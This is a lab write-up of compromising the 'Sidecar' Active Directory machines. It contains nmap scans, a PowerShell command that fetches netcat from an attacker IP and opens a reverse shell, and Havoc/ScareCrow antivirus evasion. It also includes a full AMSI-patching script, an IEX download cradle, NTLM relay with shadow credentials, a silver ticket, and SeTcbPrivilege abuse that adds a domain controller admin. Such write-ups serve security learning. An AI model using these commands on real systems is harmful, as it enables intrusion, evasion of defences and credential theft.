Sidecar, a similar AD chained machine like intercept, involved getting a shell through a lnk file, relaying authentication from WS01 by enabling WebDAV
service and performing Shadow Credentials to become local admin, password spraying and logging into DC01, the user had SeTcbPrivilege
which was used for escalating to domain admin.
DC01.Sidecar.vl
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-25 17:18:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: Sidecar.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.Sidecar.vl, DNS:Sidecar.vl, DNS:SIDECAR
| Issuer: commonName=Sidecar-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-10T15:56:40
| Not valid after: 2024-12-09T15:56:40
| MD5: 62c47cef2e582ad7f5f891a6b9702ba6
|_SHA-1: b6de4e43affd1d6bef93178d2b930940b60f7c96
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.Sidecar.vl
WS01.Sidecar.vl
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 10 Enterprise 10240 microsoft-ds (workgroup: SIDECAR)
3389/tcp open ssl/ms-wbt-server?
|_ssl-date: 2024-02-25T17:19:47+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=ws01.Sidecar.vl
| Issuer: commonName=ws01.Sidecar.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2023-12-01T14:50:58
| Not valid after: 2024-06-01T14:50:58
| MD5: bf95054282951a4ae25f660daffd32e6
|_SHA-1: 13534e4043fc6a14dd761489803358e0306608ba
| rdp-ntlm-info:
| Target_Name: SIDECAR
| NetBIOS_Domain_Name: SIDECAR
| NetBIOS_Computer_Name: WS01
| DNS_Domain_Name: Sidecar.vl
| DNS_Computer_Name: ws01.Sidecar.vl
| DNS_Tree_Name: Sidecar.vl
| Product_Version: 10.0.10240
|_ System_Time: 2024-02-25T17:19:37+00:00
We can enumerate users right off the bat with lookupsid
by specifying guest account with a null password
lookupsid.py guest@DC01.sidecar.vl 10000
From here we can try performing AS-REP roasting using GetNPUsers
but we get nothing
PORT 445 (SMB)
On DC01, we can access Public
share available with anonymous login
Only Common
directory is accessible which has few shortcut files
We can upload a malicious lnk to coerce authentication from the user who’ll open this file, the lnk file can be done created manually from windows
Uploading and running responder
However this hash cannot be cracked
Gaining shell as E.Klaymore
But we don’t need to crack this hash neither relay it as we can execute commands from lnk file, we can try to make a request on our python server
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Invoke-WebRequest -Uri 10.8.0.136 -OutFile C:/Windows/Temp/test
Now testing out to get a shell with nc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Invoke-WebRequest -Uri 10.8.0.136/nc64.exe -OutFile C:/Windows/Temp/nc.exe;C:/windows/Temp/nc.exe 10.8.0.136 2222 -e powershell.exe
From this we do get a connection back but commands don’t run, most probably this has AV enabled
For bypassing this, I used havoc payload, generated raw shell code using donut
and obfuscating it through Scarecrow
donut -i payload.exe -a x64 -o payload.bin
ScareCrow -I ./payload.bin --domain microsoft.com
On havoc we’ll get a beacon as E.klaymore, running whoami /all
to check the privileges
Here we can utilize dotnet inline-execute
to execute .NET binaries in the beacon's memory
dotnet inline-execute /opt/AD-Windows-Enum/SharpHound.exe "-c all"
And downloading it with download
, we can find this archive in havoc's loot folder
We can find this archive in havoc’s loot folder
From e.klaymore we don’t see any path for escalation
Using GetWebDAVStatus
we can verify if the webclient (WebDAV) service is enabled
Even tho it shows it’s not enabled, we can still explicitly enabled it by mapping the drive to our IP address with responder
running
shell "net use h: http://10.8.0.136/"
Performing Shadow Credentials through NTLM Relay
We have now have webdav enabled on ws01, now to receive authentication from WS01 we can use any poc for coercion also we need to add a record for our IP as this can be only done on domain joined machines, for that we can use Powermad.ps1
also for bypassing AMSI we can use this script
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]]
$func, [Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass,
AutoClass', [System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType,
$func). SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$a="A"
$b="msiS"
$c="canB"
$d="uffer"
[IntPtr]$funcAddr = LookupFunc amsi.dll ($a+$b+$c+$d)
$oldProtectionBuffer = 0
$vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool])))
$vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer)
$buf = [Byte[]] (0xb8,0x34,0x12,0x07,0x80,0x66,0xb8,0x32,0x00,0xb0,0x57,0xc3)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 12)
# Using powermad to add DNS record for our IP
IEX(New-Object Net.WebClient).downloadString('http://10.8.0.136/Powermad.ps1')
New-ADIDNSNode -Tombstone -Verbose -Node * -Data 10.8.0.136
Using SpoolSample
for coercion as it’s build with .NET we can run it using dotnet inline-execute, confirming we are getting the NTLMv2 challenge response from WS01$
dotnet inline-execute /opt/AD-Windows-Enum/SpoolSample.exe 10.10.183.214 WIN-KINFFE92UBV@80/test
Disabling HTTP, SMB and LDAP on responder so that we can use ntlmrealyx to relay WS01 hash for performing Resourse Based Constrained Delegation (RBCD)
ntlmrelayx.py -t ldaps://DC01.sidecar.vl --delegate-access -smb2support
We are successful in relaying the authentication from WS01 but this wasn’t able to create a machine account and perform the delegation,enumerating ms-DS-MachineAccountQuota
with StandIn
which is a .NET binary for enumerating AD
dotnet inline-execute /opt/AD-Windows-Enum/StandIn_v13_Net45.exe --object ms-DS-MachineAccountQuota=*
The property value is 0 so we cannot a machine account, RCBD fails here but it still possible to utilize coercion from WS01$ if there’s ADCS installed on domain
Verifying the presences of ADCS server, we can perform Shadow Credentials
by adding a certificate in msDS-KeyCredentialLink
property of WS01$ account for alternate authentication using PKINIT
, this feature isn't in the current repo of ntlmrelayx so switching the branch to shadowcredentials
ntlmrelayx.py -t ldaps://DC01.sidecar.vl --shadow-credentials --shadow-target 'WS01$'
Impersonating as local admin on WS01
Through PKINIT tools we can get the TGT/NTHash for WS01
python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx 3cIlkuYb.pfx -pfx-pass Fc0RJ71jot050cNh4MJi sidecar.vl/'WS01$' 3cIlkuYb.ccache
python3 /opt/PKINITtools/getnthash.py -key '040534a41a4b07cdaf0082333e26aa693a9eb4897f171df1b94eb66be40a0dd3' sidecar.vl/'WS01$'
To impersonate as local admin on WS01, creating silver ticket with ticketer.py
ticketer.py -domain-sid S-1-5-21-3976908837-939936849-1028625813 -domain sidecar.vl -spn HOST/WS01.sidecar.vl -nthash 40************24 -user-id 500 Administrator
secretsdump.py 'administrator'@WS01.Sidecar.vl -k -no-pass
Using smbexec.py
we can get a shell on WS01
Password sprayin on svc_deploy
Moving forward, we have Deployer
which has a resemblance with a domain user svc_deploy
which has permissions to login on DC01
Through cracksation we can recover deployer’s password and reuse it on svc_deploy
Checking the privilege, this user has SeTcbPrivilege
enabled
This privilege can be used for creating access tokens, acting as any user without needing their credentials or can run processes as SYSTEM user, using this POC from antonioCoco
Compiling this poc through Visual Studio with Release build
For abusing this we can create a new user and make him a local administrator on DC
SeTcbPrivilege.exe UwU "C:\Windows\System32\cmd.exe /c net user arz P@ssw0rd /add && net localgroup administrators arz /add"
Now we can just login again through winrm
References
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/living-off-the-land
- https://pikaroot.github.io/_blogs/2023-02-25-HAVOC_Framework
- https://assume-breach.medium.com/home-grown-red-team-getting-system-on-windows-11-with-havoc-c2-cc4bb089d22
- https://github.com/G0ldenGunSec/GetWebDAVStatus
- https://www.thehacker.recipes/a-d/movement/mitm-and-coerced-authentications/adidns-spoofing
- https://github.com/senzee1984/Amsi_Bypass_In_2023
- https://github.com/jtmpu/PrecompiledBinaries
- https://github.com/FuzzySecurity/StandIn/releases/download/v1.3/StandIn_v13_Net35_45.zip
- https://github.com/ShutdownRepo/impacket/tree/shadowcredentials
- https://github.com/med0x2e/NTLMRelay2Self/tree/main
- https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations
- https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178